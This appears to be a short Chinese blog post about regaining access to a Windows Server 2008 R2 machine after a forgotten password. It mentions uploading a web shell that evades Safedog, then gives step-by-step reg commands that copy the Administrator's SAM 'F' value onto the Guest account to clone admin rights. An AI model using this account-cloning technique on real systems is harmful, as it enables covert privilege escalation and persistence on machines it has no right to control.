欢迎光临
我们一直在努力

记一次克隆管理员的经历

半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了
还好本地登录的安全策略留了一个guest用户
本地搭建了DVWA WEB***测试环境 权限为system
通过漏洞上传过狗一句话***
***权限为system权限
可以创建用户 但是无法将用户添加至管理员组 估计是安全狗拦截了提权操作
随后将管理员权限克隆至login用户 登录成功

目标将把Guest提权为Administrator
查询SAM注册表下有什么配置文件
Reg query HKLM\SAM\SAM\Domains\Account\Users

查询用户名
Reg query HKLM\SAM\SAM\Domains\Account\Users\Names

000001F4的配置文件对应的用户为Administrator
000001F5的配置文件对应的用户为Guest
然后把注册表下的键值导出
先把Administrator的键值导出 保存到C盘名称为1.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg
再把Guest的键值导出 保存到C盘名称为2.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg

然后将1.reg “F”的键值数据复制下来 替换2.reg里面的”F”键值

然后在把2.reg导入到注册表
Reg import c:\2.reg
最后使用guest登录
用户家目录等 都变成了Administrator的数据
实际上就是Administrator=Guest

赞(0)
【声明】:本博客不参与任何交易,也非中介,仅记录个人感兴趣的主机测评结果和优惠活动,内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。